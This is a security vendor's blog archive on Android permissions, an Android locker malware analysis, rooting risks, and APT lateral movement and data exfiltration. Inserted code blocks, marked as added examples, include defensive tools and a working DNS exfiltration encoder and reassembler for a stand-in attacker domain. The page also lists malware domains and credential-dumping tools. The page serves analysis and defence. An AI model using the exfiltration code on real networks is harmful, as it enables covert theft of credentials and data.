Archive for the ‘Security’ Category

Pick the Permissions; Android Marshmallow

Wednesday, September 2nd, 2015

This blog intends to inform the general public about some of the feature enhancements in the next version of Android (6.0), labelled “Android Marshmallow”, focusing on the significance of an application’s permission list.

Last week Google announced its next version of Android, Android 6.0 nicknamed “Marshmallow”. Though the final release date of Marshmallow is not yet confirmed, here are some of the interesting features included in Marshmallow, by no means an exhaustive list:

  • Android Pay

With this feature users enter their credit card details once and Google creates a virtual account number that is presented at NFC checkout in place of the real card number, making the checkout process easier and exposing less of the user’s card data to the merchant.

  • Application linking

At present, when a user taps a link, a dialog box prompts the user to choose one of the installed applications (Chrome, another browser, or an app that claims the link) to open it. With Android Marshmallow, the OS can verify the link against the application’s own web server: provided the corresponding app is installed, the developer has enabled the auto-verify feature in the app, and the website publishes a matching statement, the link is opened directly within the application without the chooser dialog.
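As an added example (this is not code from the original post or from Android itself), the check the OS performs during auto-verification can be written out as a stand-alone function. Android fetches the site’s statement over HTTPS; here the statement is a constructed in-memory JSON document, and the package name and signing-certificate fingerprint are made-up values. The point the code makes is that the site delegates link handling to one package signed with one certificate, so a repackaged app using the same package name but a different signing key fails the check:

```python
# Added example, not from the original post: verify an Android app link statement.
import json

# Assumed values for a hypothetical app; both are made up for this example.
PACKAGE = "com.example.news"
GOOD_FP = ("14:6D:E9:83:C5:73:06:50:D8:EE:B9:95:2F:34:FC:64:"
           "16:A0:83:42:E6:1D:BE:A8:8A:04:96:B2:3F:CF:44:E5")
HANDLE_ALL_URLS = "delegate_permission/common.handle_all_urls"

# Constructed stand-in for what the site would publish at
# https://news.example.com/.well-known/assetlinks.json (assumed host).
SITE_STATEMENT = json.dumps([{
    "relation": [HANDLE_ALL_URLS],
    "target": {
        "namespace": "android_app",
        "package_name": PACKAGE,
        "sha256_cert_fingerprints": [GOOD_FP],
    },
}])


def verify_app_link(statement_json: str, package_name: str, cert_fingerprint: str) -> bool:
    """Return True only if the site explicitly delegates URL handling to this
    exact package signed with this exact certificate. Anything malformed,
    missing or mismatched fails closed (False)."""
    try:
        statements = json.loads(statement_json)
    except json.JSONDecodeError:
        return False
    if not isinstance(statements, list):
        return False
    wanted = cert_fingerprint.upper()          # fingerprints compare case-insensitively
    for st in statements:
        if not isinstance(st, dict):
            continue
        if HANDLE_ALL_URLS not in st.get("relation", []):
            continue
        target = st.get("target", {})
        if target.get("namespace") != "android_app":
            continue
        if target.get("package_name") != package_name:
            continue
        fps = {fp.upper() for fp in target.get("sha256_cert_fingerprints", [])}
        if wanted in fps:
            return True
    return False


if __name__ == "__main__":
    print("genuine app:", verify_app_link(SITE_STATEMENT, PACKAGE, GOOD_FP))
    # A trojanised clone keeps the package name but cannot reuse the signing key.
    print("repackaged app:", verify_app_link(SITE_STATEMENT, PACKAGE, "AA:" + GOOD_FP[3:]))
```

Note that the verification ties the link to the signing certificate, not just the package name; that is what stops a malicious app from silently claiming a bank’s or a shop’s links.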

  • Unlock feature

Fingerprint scanner support.

  • Power

Though not security-related, it is interesting to know that “Doze Mode” is incorporated to improve the device’s standby time. Using the motion sensors, Android identifies whether the device is idle or in use; if it is idle, Android defers background network access and scheduled jobs to conserve battery.

  • App permissions

Yes! Now I can choose what an application is allowed to do while it runs. Traditionally, Android applications ask the user for all their resource-access permissions at install time, and these permissions cannot be modified after installation. With Android Marshmallow, users can allow or deny individual permissions from an application’s permission list while the application is installed and running. The feature description states that applications will request a permission the first time the feature needing it is invoked, instead of requesting every permission in one go at installation. Applications built for older Android versions still receive their permissions at install time, but the user can revoke them from Settings. As much Android malware disguises itself as a legitimate application or is bundled with one, restricting an application by its permissions (which in turn restricts the app’s functionality) helps protect the user’s device and personal data.

However, user awareness about which permissions an application actually needs for its functionality is still essential. As we discussed in our previous blog, a taxi-booking application does not typically need permission to read the files on the device’s SD card, and a gaming application does not need access to contacts information to operate. Users should know which permissions to grant or deny in order to obtain the application’s actual functionality and nothing more.
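As an added example (not code from the original post), here is the kind of check described above written as a small script: it pulls the permissions an APK’s AndroidManifest.xml requests and compares them with what an app of that category plausibly needs. The manifest is constructed for illustration, and the package name, the per-category baselines and the high-risk list are assumptions, not data from the blog:

```python
# Added example, not from the original post: audit requested Android permissions.
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed manifest for a hypothetical taxi-booking app (package name assumed).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.taxi">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <application android:label="Taxi"/>
</manifest>
"""

# Assumed baselines: what an app of each category reasonably needs.
EXPECTED = {
    "taxi": {"android.permission.INTERNET",
             "android.permission.ACCESS_FINE_LOCATION",
             "android.permission.ACCESS_COARSE_LOCATION",
             "android.permission.CALL_PHONE"},
    "game": {"android.permission.INTERNET",
             "android.permission.VIBRATE"},
}

# Permissions that malware commonly abuses and that deserve a hard look
# regardless of category (assumed list, not exhaustive).
HIGH_RISK = {"android.permission.SEND_SMS", "android.permission.RECEIVE_SMS",
             "android.permission.READ_SMS", "android.permission.READ_CONTACTS",
             "android.permission.READ_CALL_LOG", "android.permission.RECORD_AUDIO"}


def requested_permissions(manifest_xml: str) -> set:
    """Return the set of <uses-permission android:name=...> values in a manifest.
    The attribute lives in the android namespace, hence the {ns}name key."""
    root = ET.fromstring(manifest_xml)
    key = f"{{{ANDROID_NS}}}name"
    return {elem.get(key) for elem in root.iter("uses-permission") if elem.get(key)}


def audit(manifest_xml: str, category: str) -> dict:
    """Split requested permissions into expected / unexpected / high-risk."""
    requested = requested_permissions(manifest_xml)
    expected = EXPECTED[category]
    unexpected = requested - expected
    return {
        "expected": sorted(requested & expected),
        "unexpected": sorted(unexpected),
        "high_risk": sorted(unexpected & HIGH_RISK),
    }


if __name__ == "__main__":
    report = audit(SAMPLE_MANIFEST, "taxi")
    for key, perms in report.items():
        print(f"{key}:")
        for p in perms:
            print(f"  {p}")
```

For the constructed taxi app the script flags SD-card, contacts, boot-completed and SMS permissions as unexpected, and two of them as high risk; on Marshmallow those are exactly the prompts a user should answer with “deny”.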

In addition, if the same permission restrictions apply to a legitimate security application, there is a possibility that malware with super-user access could modify the granted permission list of the security application. As suggested in our VB2014 paper, updating the Android OS framework so that trusted security applications are loaded earlier than any other installed application could help handle such situations.

Image courtesy:
Androidpit.com

V.Dhanalakshmi
Senior Threat Researcher, K7TCL

If you wish to subscribe to our blog, please add the URL provided below to your blog reader: http://blog.k7computing.com/feed/

Social Networking Abuse – Potent Threat

Thursday, August 20th, 2015

This blog intends to highlight some of the dangers faced by the general public associated with the ever expanding use of social networking sites, set to grow at an even greater rate after the launch of government initiatives such as the Digital India campaign.

Social networking sites such as Twitter and Facebook provide an efficient interface for communicating with many people in a user-friendly manner. People are connected to their friends, family and followers in real time, on the go, using mobile devices. The ugly side of this increasing use of social networking sites is the potential for controlled, targeted abuse within a very short space of time. Recently The Hindu newspaper reported the abuse of Twitter in the recruitment programme of banned organisations.

Users of social networking sites do not appear to think twice about sharing large amounts of their Personally Identifiable Information (PII) online. This freely available PII, which includes date of birth, phone number, address and so on, allows malevolent actors to make their attacks more targeted and more convincing. In addition, given the speed of transmission, attackers can reach a large number of victims very quickly, potentially triggering a mass panic, spreading malware, or boosting recruitment for banned organisations.

There is at least one documented case of the use of social networks to trigger mass panic in India through the use of doctored images and targeted, threatening messages. In August 2012 thousands of Indians from some North-Eastern states of the nation were made to feel threatened to the extent that they decided to flee in large numbers to their home states from other parts of the country; a grave situation indeed.

The above real-world example provides a stark reminder about the havoc that can be caused when malicious content goes viral, either intentionally or otherwise. Legislation related to IT in many countries provides for monitoring of online content, inclusive of social networking sites, especially given that national security could well be at stake. In the documented case mentioned above, the attack vectors were neutered and some semblance of normality restored only after the offending sites were temporarily blocked and bulk SMS/MMS were banned for a short time as per the provisions in law.

Some images (adapted to suit the article) are courtesy of several sites.

Samir Mody
Senior Manager, K7TCL


Gone in 60 Seconds: Is the Internet Becoming Volatile?

Friday, August 14th, 2015

This blog intends to inform the general public about the impact on the Internet of an increase in the prevalence of self-destructing messaging services.

Almost every one of us is happy to have more than one genie at hand: a smartphone, a tablet, a laptop, and so on, where a click of a button or a touch on the screen satisfies our cravings, from food to knowledge. The communication world, too, is never short of new things popping up, with tweets, pokes, chats, likes, posts and so on.

Don’t we enjoy a twist in the movies we watch? One has to wonder whether the Internet is the next ‘anterograde amnesia’ victim, as an unforeseen twist silently takes over social networking services: messages that are forgotten as soon as they are read.

On one hand, Hadoop technology is booming to handle the exponential growth of data, and spiders are crawling the internet to feed search engines. On the other, a counterweight is emerging in the form of self-destructing communication, important enough to discuss because the number of apps and services providing this functionality, and the number of their users, grows every day. The social networking giants’ competing feature is shifting focus from providing nearly unlimited storage space to providing an expiry time on demand. Silently, this balance is inching toward creating major chunks of a lost internet.

When communicating confidential information over the internet, there is a jolt of hesitation in us. We think several times about whether we can trust the internet and its services, and for one reason or another we settle for the communication services we get online.

Now, the privacy jolt is taking a noticeable turn, because these services seem to hand more power to users: data wiping, evidence shredding and “suicidal messages”. It is not unusual to regret sending a file or a message to an unintended recipient, or liking the wrong post or comment by mistake. But it is also important to note that these auto-timed or customisable self-expiring messages are redefining secretive communication.

This trend seems to cure the privacy fever of social media with email bombs, ephemeral messages, auto-expiring tweets, timed chats, self-deleting pokes and much more, where previously it had to hold itself together with features such as ‘recall’ or ‘undo’ for a sent email, off-the-record chats, etc.

Such self-destructing email services promise to erase the email itself, and the trail it left across their servers, within a prescribed time. Promises like these are not new to us; we have relied for years on strong encryption and secure channels. Note, though, that a promise to delete is enforced by the provider’s software, not by cryptography: the recipient’s device and any intermediate server that kept a copy are outside the sender’s control.

There is always more than one solution to a problem. A few apps use temporary hyperlinks. Some provide a one-time password to access a timed web page; the password and the page are unavailable after the expiry time. Some store the contents temporarily on servers until the message has been delivered to all intended recipients, then delete the contents from the servers and from the recipient’s inbox once the message has been read. Some rely on external apps and browser extensions.

Some apps face issues such as screenshots being taken, content being accessed by other means than the app’s own viewer, and message-ID flaws on related websites. Some apps have already been caught out by forensic studies because they merely save images and videos in hidden folders or rename the files to unfamiliar extensions rather than deleting them; researchers are willing to spend many hours and thousands of dollars on such research. Competitors, meanwhile, release newer products with upgraded versions offering ever more sophisticated communication systems.

Cyber criminals use such services widely to communicate their secrets or to threaten victims. Of course, anyone can use these services for a legitimate conversation as well. Self-expiring attachments are also joining this feature set, preventing messages from being copied, forwarded, edited, printed or saved, at least within the app; a screenshot or a second device’s camera still defeats such controls.

With competitors focusing on providing the self-destruction feature, the following questions arise:

  • Will the internet become erasable?
  • Will social networking become the most secret communication method going forward?
  • Did we just discover invisible data or communication?
  • Will these mortal messages force the cybercrime lexicon to accept their demise?
  • Will the expansion of SMS change to Short-lived Messaging Service?
  • Will cyber crime investigators exclaim: “Eureka! But where did the evidence go?”

Looks like we just have to wait and watch what surprises the future brings.

Images courtesy of:
cdn-media-1.lifehack.org/wp-content/files/2014/04/7557deec.jpg
blog.ericgoldman.org/wp-content/uploads/2014/08/shutterstock_167170781.jpg

Ayesha Shameena P
Threat Researcher, K7TCL


Patch Released, Before You Can Say ‘Patch Tuesday’

Friday, July 10th, 2015

Microsoft is set to move away from its cycle of serving up security updates on the second Tuesday of every month, (un)officially known as ‘Patch Tuesday’ in tech circles.

In an earlier blog post we mentioned that Microsoft is doing all it can to strengthen its security posture. Along the same lines, this move ensures that any security update, critical or not, reaches a Windows 10 user immediately rather than waiting for up to a month.

Yes, updates will be rolled out 24/7, year round, for all devices that run Windows 10, thereby potentially reducing the time taken to address a security issue once it is found. These releases are not restricted to security updates alone; software enhancements will follow the same pattern. A round-the-clock approach to updating the OS could also improve the quality of the updates; in the past there have been issues with unstable patches.

While the monthly cycle will remain available to business and professional users, Microsoft has reworked it under the title Windows Update for Business. This provides features to prioritise patching for chosen devices, to specify maintenance windows during which updates may occur, and peer-to-peer delivery of updates to conserve bandwidth in environments with a large number of computers.

This expedited update schedule is primarily aimed at securing devices as soon as possible once a security lapse has been identified and fixed. Though Microsoft says users will receive free upgrades for the lifetime of the device, that timeframe may in fact be tied to the type of device the OS runs on and the device’s supported lifetime.

Perhaps Microsoft is taking the timely patching of security lapses to an even higher level because much supposedly dead and buried malware (Conficker, etc.) that is not supposed to be spreading is still doing the rounds, simply because a patch has not been applied. It is imperative that we as users take security at least as seriously as Microsoft appears to be doing.

Image courtesy of:
keepcalm-o-matic.co.uk

Kaarthik R.M
K7TCL


My App or No App

Monday, June 1st, 2015

Last week in our K7 Threat Control Lab we came across an Android ransomware “locker” sample with a difference. This one displays a lock screen that recommends to the user a list of free applications to install in order to continue using any already installed application, as shown below:

However, if the user chooses to install one or all of the listed applications, the list seems endless: a new application is inserted in place of each one chosen for installation. This implies that the user may never regain access to the already installed applications, or that it would take a very long time to exhaust the displayed list. Interestingly, the applications installed from the lock screen list open freely and are not blocked by the splash screen.

Now let us see how this malware actually works.

Analysis of this locker shows that the AndroidManifest.xml of the package registers two RECEIVERS (net.fatuously.Unengaged and net.fatuously.Encephalitis) for the broadcasts BOOT_COMPLETED, USER_PRESENT, SCREEN_ON, NEW_OUTGOING_CALL, PHONE_STATE and DEVICE_ADMIN_ENABLED. However, the registered receiver classes are nowhere to be found in the package’s top-level classes.dex.


In addition, when this locker sample is executed, the application displays an extra custom explanatory message that is also not referenced in the top-level package, as shown in the picture below:


Digging further, it turns out that the APK under study carries within itself an encrypted (XORed) ZIP file (test.dat) in the assets folder, which in turn contains the classes.dex that is loaded at run time.

The APK loads the classes.dex from the decrypted ZIP using Android’s dynamic class loading feature, as shown in the Java source below:


The RECEIVERS registered in the top-level AndroidManifest.xml and the additional explanation on the Device Admin request screen are all referenced from the dynamically loaded classes.dex extracted from that ZIP.
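As an added example (this is analyst-side tooling, not code from the post or from the malware), the unpacking step can be automated. The post says test.dat is an XORed ZIP but does not give the key; the script below assumes a single-byte key and recovers it by known-plaintext, since the first four bytes of any ZIP must decrypt to the local-file-header magic PK\x03\x04. It then opens the archive, pulls out classes.dex and checks the DEX magic. The asset it works on is constructed in memory for illustration:

```python
# Added example, not from the original post: recover a single-byte-XOR "encrypted"
# ZIP asset (the post's test.dat) and extract the classes.dex it carries.
import io
import zipfile

ZIP_MAGIC = b"PK\x03\x04"      # ZIP local file header signature
DEX_MAGIC = b"dex\n"           # first 4 bytes of every DEX file (e.g. "dex\n035\0")


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def recover_xor_key(blob: bytes) -> int:
    """Known-plaintext attack: each of the first 4 bytes XOR the expected magic
    byte must yield the same key. Raises ValueError if no single-byte key fits."""
    if len(blob) < len(ZIP_MAGIC):
        raise ValueError("asset too short to be a ZIP")
    candidates = {blob[i] ^ ZIP_MAGIC[i] for i in range(len(ZIP_MAGIC))}
    if len(candidates) != 1:
        raise ValueError("not a single-byte XOR of a ZIP (or a different container)")
    return candidates.pop()


def extract_dex(asset: bytes) -> tuple:
    """Decrypt the asset, open it as a ZIP and return (key, classes.dex bytes)."""
    key = recover_xor_key(asset)
    plain = xor_bytes(asset, key)
    with zipfile.ZipFile(io.BytesIO(plain)) as zf:
        names = zf.namelist()
        dex_name = next((n for n in names if n.endswith("classes.dex")), None)
        if dex_name is None:
            raise ValueError(f"no classes.dex in archive, members: {names}")
        dex = zf.read(dex_name)
    if not dex.startswith(DEX_MAGIC):
        raise ValueError("extracted member does not carry the DEX magic")
    return key, dex


def build_sample_asset(key: int = 0x5A) -> bytes:
    """Constructed stand-in for test.dat: a ZIP holding a header-only fake
    classes.dex, XORed with `key`. The real sample's key is not known here."""
    fake_dex = DEX_MAGIC + b"035\x00" + b"\x00" * 64
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("classes.dex", fake_dex)
    return xor_bytes(buf.getvalue(), key)


if __name__ == "__main__":
    key, dex = extract_dex(build_sample_asset())
    print(f"recovered key 0x{key:02x}, classes.dex is {len(dex)} bytes, magic {dex[:8]!r}")
```

Once the inner classes.dex is on disk it can be disassembled like any other, which is how the receiver classes named in the manifest turn up. If the first four bytes do not yield a single key, the sample is using something other than single-byte XOR and the script says so rather than guessing.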


When the user tries to open any application installed before the locker, the malware brings up the splash screen by passing the splash screen content as the data of an “android.intent.action.VIEW” intent, as seen in the following code:

When run without an internet connection, or during application initialisation, this malware loads a different splash screen, as shown below:

The corresponding code to load the above screen is:

And the contents of none.html are as follows:

Base64 encoded data in this HTML contains the image (.PNG) content to be displayed.

A few of the websites to which this malware connects are:

sexualletube[dot]biz
pornigy[dot]biz
pornsage[dot]biz
adeffective[dot]org

Strangely, the splash screen does not demand any payment from the user. It is malevolent all the same, as it prevents the user from opening any application installed before the locker.

As we discussed in our VB2014 paper “Early launch Android malware: your phone is 0wned”, an updated boot and broadcast framework in the Android OS that allows the security products to load before any other application will help to keep these locker variants at bay. K7Mobile Security protects its users from this locker with the detection called “Trojan (004c2fc61).”

V.Dhanalakshmi, Senior Threat Researcher, K7TCL


Rooting for Trouble

Friday, May 22nd, 2015


Despite device manufacturers’ warnings that rooting voids the warranty, users still root their Android phones for various reasons: installing special applications that run only on a rooted device, removing built-in apps, USB tethering, turning the device into a Wi-Fi hotspot, and so on. They do this at the expense of security and performance, and potentially of the phone itself, since the device-dependent rooting process can fail at any step with no warranty safety net.

Apart from the traditional rooting methods, there are tools available online to root the device; these run either through ADB from a computer or as an app installed directly on the device.

One should also be aware that much Android malware requires root access (administrative power) to carry out its mala fide functions on the victim’s device. It acquires root by being bundled with legitimate applications that require root, by triggering an application on the victim’s device that already has root, or by invoking exploits it carries within itself, as in the case of Android/DroidDream, which carried the exploits RageAgainstTheCage and Exploid. The recent Android PowerOffHijack malware further exemplifies the ill effects on the Android operating system once administrative power is acquired by malware.

Security enhancements in Android notwithstanding, new vulnerabilities and exploits for the OS are still identified regularly. According to Microsoft’s recent security intelligence report, which includes statistics on vulnerabilities and exploits for the second half of 2014, many of the non-Windows exploit files encountered on Windows computers target the Android operating system (attributed in the report to the Open Handset Alliance).

All this implies that Android smartphone users should:

  • Ponder whether they really need to root the device
  • Be vigilant about the applications downloaded to root the device
  • Download the required application only from the official Google Play Store
  • Turn on the feature of “Verify apps” that is available with Android 4.2 or higher

Images courtesy of:
Talkandroid.com
Rootmyandroid.org
www.techlegends.in

V.Dhanalakshmi, Senior Threat Researcher, K7TCL


Shell Team Six:Zero Day After-Party (Part VI)

Monday, April 27th, 2015

This is the final part of a six-part blog based on the paper submitted by my colleague Gregory and myself on Advanced Persistent Threats (APT), for AVAR 2014. Continuing from the fifth part of our paper…

Data Exfiltration and Cleanup



This stage of the APT involves the assailants collecting the sensitive data and transmitting it stealthily to a remote location. Data extraction can either be a one-time event or spread over a period of time, followed by constant snooping of the victim, all the while remaining hidden.

Once the objective of an APT campaign is achieved, the attackers exit the network in a phased manner after covering their tracks and clearing all the potential evidence of an intrusion.  The attackers could also plant or manipulate data in the target’s environment in an effort to create misdirection.

Extraction methodology

Confidential data that is collected during the period of the APT is copied to a staging server, compressed, encrypted and kept ready for transfer. Outbound sessions are then established that resemble legitimate traffic thereby attempting to fly under the security radar. The confidential data is thus extracted possibly in small chunks over a period of time.

The bad actors could exfiltrate data using any/all of the following methods:

HTTP/FTP/Cloud Storage Uploads

An HTTP/FTP upload or a cloud transfer is initiated by an application that the firewall already permits. Additionally, the packets may be SSL/TLS or custom encrypted, making it difficult for security solutions to inspect the contents.

Outgoing Emails with Password Protected Attachments

Sensitive contents are password protected and then transmitted using either a compromised employee’s email credentials, or by using a custom SMTP server.

Customized DNS Queries

Small chunks of data such as user credentials may be encoded into custom DNS queries for domains whose authoritative name servers the attackers control. The chunks are then reassembled as required at the attackers’ end.

Fig.14. shows encrypted data sent as a DNS query
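As an added example (not from the AVAR paper), here is the DNS channel written out from both sides: the victim side encodes stolen bytes into query names, and the attacker side reassembles them from the queries its name server logged. The attacker domain, the session tag and the chunk layout are assumptions chosen to respect DNS limits (63 bytes per label, 253 bytes per name); no traffic is actually sent, the “queries” are just strings:

```python
# Added example, not from the AVAR paper: DNS exfiltration encoding and reassembly.
import base64

ATTACKER_DOMAIN = "updates.example.net"      # assumed attacker-controlled zone
MAX_LABEL = 63                               # DNS label length limit


def encode_queries(data: bytes, session: str, domain: str = ATTACKER_DOMAIN) -> list:
    """Victim side: split `data` into query names of the form
    <seq>.<session>.<base32 chunk>.<domain>. Base32 is used because DNS names
    are case-insensitive, so base64 would not survive resolvers that lowercase."""
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    names = []
    for seq, start in enumerate(range(0, len(b32), MAX_LABEL)):
        piece = b32[start:start + MAX_LABEL]
        names.append(f"{seq}.{session}.{piece}.{domain}")
    return names


def reassemble(queries: list, session: str, domain: str = ATTACKER_DOMAIN) -> bytes:
    """Attacker side: from a (possibly reordered) list of logged query names,
    pick the ones for `session` and rebuild the original bytes."""
    pieces = {}
    suffix = "." + domain
    for q in queries:
        if not q.endswith(suffix):
            continue
        seq, sess, piece = q[:-len(suffix)].split(".", 2)
        if sess == session:
            pieces[int(seq)] = piece
    b32 = "".join(pieces[i] for i in sorted(pieces))
    pad = "=" * (-len(b32) % 8)              # restore the base32 padding we stripped
    return base64.b32decode(b32.upper() + pad)


if __name__ == "__main__":
    SECRET = b"user=jdoe;pass=Winter2015!;host=fileserver01"   # constructed sample
    qs = encode_queries(SECRET, "a1f3")
    for q in qs:
        print(q)
    # Queries may arrive out of order; reassembly sorts by sequence number.
    print(reassemble(qs[::-1], "a1f3") == SECRET)
```

A 45-byte credential string becomes two queries of about 90 characters each, which is why the detection advice in the paper focuses on the volume and shape of queries under one domain rather than on any single packet.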

VPN/IPv6 Tunnels

VPN and IPv6 tunnels are created from the staging server to a remotely controlled machine. The contents are then securely transmitted through these tunnels.


The hacking outfit commonly known in computer security circles as Comment Crew [13] has been observed using the above data exfiltration techniques. Sensitive data, potentially gigabytes in size, would first be collected in a centralised location and compressed into a password-protected RAR file. The final archives would then be split into chunks and uploaded using FTP, custom file transfer tools, etc.

Cleanup Methodology

The attackers tend to delete their malicious code and its associated components by remotely issuing self-destruct commands from their C2C server. A time/event bound kill switch built into the malicious code could also be automatically triggered to avoid being caught.

System logs that maintain login attempts, security logs that maintain protection status, audit files that track system changes, etc. are modified by the attackers to make a forensic reconstruction of the attack impossible.

Indicators of Compromise

Capturing and transmitting confidential data is the raison d’etre of any APT. In order to facilitate this transmission, the attacker must contact external servers from inside the victim’s network.

Here are some of the common symptoms that indicate suspicious activity within the organization’s network:

Wrong Data in the Wrong Place

Movement of encrypted or confidential data from a machine holding sensitive information to a potential upload server with Internet access, all within the organisation’s internal network, could indicate that something is wrong.

Similarly, the presence of large quantities of known-encrypted or sensitive data on a machine it is not supposed to be on could indicate that something is amiss.

Anomalous Traffic


The following anomalies could indicate a compromise:

  1. Connections made directly to IP addresses
  2. HTTP/FTP connections on non-standard ports
  3. Connections to previously unused or high risk geo locations
  4. Accessing algorithmically generated domain names (DGA)
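As an added example (not from the AVAR paper), the four anomaly checks above can be run over a handful of proxy/flow log records. The records, the baseline of previously seen countries, the per-protocol table of expected ports and the DGA heuristic are all constructed assumptions for illustration; a real deployment would derive the baselines from its own traffic history:

```python
# Added example, not from the AVAR paper: flag anomalous outbound connections.
import ipaddress
import math
from collections import Counter

# Constructed records: (src_host, destination, dest_port, protocol, country)
SAMPLE_LOG = [
    ("ws-14", "www.example.com",      443,  "https", "US"),
    ("ws-14", "203.0.113.45",         80,   "http",  "US"),   # direct to an IP
    ("ws-22", "mail.example.org",     8443, "http",  "US"),   # HTTP on 8443
    ("ws-22", "files.example.org",    2121, "ftp",   "US"),   # FTP on 2121
    ("ws-31", "xk3q9vz7lp2mw8h.com",  443,  "https", "US"),   # DGA-looking name
    ("ws-31", "intranet.example.com", 443,  "https", "US"),
    ("ws-07", "cdn.example.net",      443,  "https", "XX"),   # never-seen geo
]

BASELINE_COUNTRIES = {"US", "IN", "GB"}                  # assumed history
STANDARD_PORTS = {"http": {80, 8080}, "https": {443}, "ftp": {21}}


def is_ip_literal(dest: str) -> bool:
    try:
        ipaddress.ip_address(dest)
        return True
    except ValueError:
        return False


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def looks_dga(dest: str) -> bool:
    """Heuristic: a long first label with high character entropy and few vowels.
    Thresholds are assumptions tuned for this sample, not a production model."""
    label = dest.split(".")[0]
    if len(label) < 12:
        return False
    vowels = sum(label.count(v) for v in "aeiou")
    return shannon_entropy(label) > 3.3 and vowels / len(label) < 0.25


def find_anomalies(records: list) -> list:
    """Return (src_host, destination, reason) for every record that trips a check."""
    findings = []
    for src, dest, port, proto, country in records:
        if is_ip_literal(dest):
            findings.append((src, dest, "direct connection to IP address"))
        if proto in STANDARD_PORTS and port not in STANDARD_PORTS[proto]:
            findings.append((src, dest, f"{proto} on non-standard port {port}"))
        if country not in BASELINE_COUNTRIES:
            findings.append((src, dest, f"previously unused geo location {country}"))
        if not is_ip_literal(dest) and looks_dga(dest):
            findings.append((src, dest, "algorithmically generated domain name"))
    return findings


if __name__ == "__main__":
    for src, dest, reason in find_anomalies(SAMPLE_LOG):
        print(f"{src:6} -> {dest:24} {reason}")
```

Each check on its own produces false positives (plenty of legitimate software talks to bare IPs or uses 8443); the value is in correlating several of them from the same host within a short window.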

Other Indicators

Inconsistent events in audit logs maintained at network and endpoint level, changes in the system driver list without a corresponding application installation or removal, etc. can also be used as indicators of compromise.

Prevention/Detection

Confidential information is the crown jewel of any company, and typically it is this information that the attacker is focused on stealing. The following solutions can help prevent or detect the exfiltration of this confidential data:

Hardened DNS Servers


Outgoing DNS queries should be logged and monitored extensively for anomalies. Organizations could also create and maintain their own hardened DNS servers.

Security Solutions

Data aware technologies like Data Leakage Prevention (DLP) can be added to the organization’s existing layer of defense. Once critical and confidential data is identified, DLP solutions track and prevent this data from falling into the wrong hands.

URL scanners with built-in reputation intelligence can be used to detect:

  1. Access to subdomain/domains which are not popular or appear suspicious
  2. Repeated attempts to connect to domains which no longer resolve
  3. Attempts to connect to blacklisted or malicious IP addresses/domains
  4. Newly registered domains

Network scanners with Deep Packet Inspection and machine learning capabilities can be used to build a knowledge base of general network usage trends. Alarms are raised when deviations exceed pre-defined thresholds. This knowledge base includes:

  1. Commonly used protocols with source and destination information
  2. Common geo locations contacted
  3. Number of connections and the length of connections made depending on the time of the day

Software that takes disk backups and dumps physical memory images at regular intervals is of great help during incident response and forensic analysis of a potential APT attack.

Conclusion

The implications of the complexity and perseverance of Advanced Persistent Threats are of major significance to the existing security infrastructure. The evasion techniques discussed in this paper have exerted colossal pressure on the current methods used to detect and report these threats, especially where the human element is involved.

Safeguarding oneself against APTs requires more than just traditional security solutions. The need of the hour is a comprehensive, holistic security plan that intelligently integrates events reported from numerous forms of security established at various levels of the organization. This solution should be able to handle massive volumes of logs and spot patterns of an attack, find sources of a breach and stop new threats in their tracks.

Things are about to get a whole lot more difficult with compromised mobile devices joining the fray. Strategies to identify and stop sophisticated, multi-pronged APT attacks have been discussed; however coordinated implementation is far from straightforward. We live in interesting times.

References:

[13] http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf

Lokesh Kumar
K7 Threat Control Lab


Shell Team Six:Zero Day After-Party (Part V)

Friday, April 10th, 2015

This is the fifth part of a six-part blog based on the paper submitted by my colleague Gregory and myself on Advanced Persistent Threats (APT), for AVAR 2014.

Continuing from the fourth part of our paper

Expanding Access and Strengthening Foothold

The device that falls first is usually not the primary target of the APT. This backdoored computer is instead used as a base to search and compromise more devices that likely contain credentials to other workstations, application servers, etc. The assailants move laterally within the network, gaining access to these machines, strengthening their foothold, all the while hunting for valuable target information which was the objective of the attack.

Expansion Methodology

The initial infected host connects back to a command and control (C2C) infrastructure controlled by the bad actors. It sends critical information such as password details, privileges of the currently logged user, mapped drive information, etc. and awaits further instructions. The following techniques are used by the attackers to expand their access:

Privilege Escalation

The attackers exploit privilege escalation vulnerabilities to escape the confines of a limited user’s account. The objective here is to gain “root” on the infected machine which enables them to perform tasks that require elevated privileges such as creating/deleting system services, accessing critical process’ memory space, mapping internal networks, etc.

Fig.13: Privilege escalation code used from the Council for Foreign Relations Watering Hole attack

Remote Exploitation

Malware components can exploit network vulnerabilities to compromise systems accessible in the local network. The Stuxnet malware exploited a 0day Print Spooler (CVE-2010-2729) remote code execution vulnerability to propagate itself into new machines.

Installing More Tools

During the initial compromise, the malware authors use custom zero-day code that exploits vulnerabilities in common applications. In the expansion stage of the APT though, to avoid having to re-write code, the bad actors tend to use standard tools.

These tools could include system utilities like PsExec [9], network packet sniffers like tcpdump [10], password extracting tools like gsecdump [11], Cain&Abel [12], etc.

Obtain Credentials

With the help of the installed tools, the attackers dump cached credentials or brute-force logins to workstations and servers that likely contain sensitive data.

They could establish remote desktop sessions to these machines and eventually make their way onto domain controllers that have unrestricted access to the entire network.  They then begin their hunt for the target data to be extracted, if they haven’t found it already, that is.

Indicators of Compromise

Once the assailants possess domain level credentials, their movement within the network resembles that of legitimate traffic and so becomes very difficult to track. The following behaviors on the other hand could indicate a compromise and are relatively easy to track:

Presence of Unwarranted Files

Unauthorized use of kernel modules to elevate one’s privileges could imply a compromise. The presence of unapproved software, modified versions of existing drivers containing trojanized code, and tools such as port scanners, password crackers and network sniffers could also indicate a compromise.

Login Irregularities

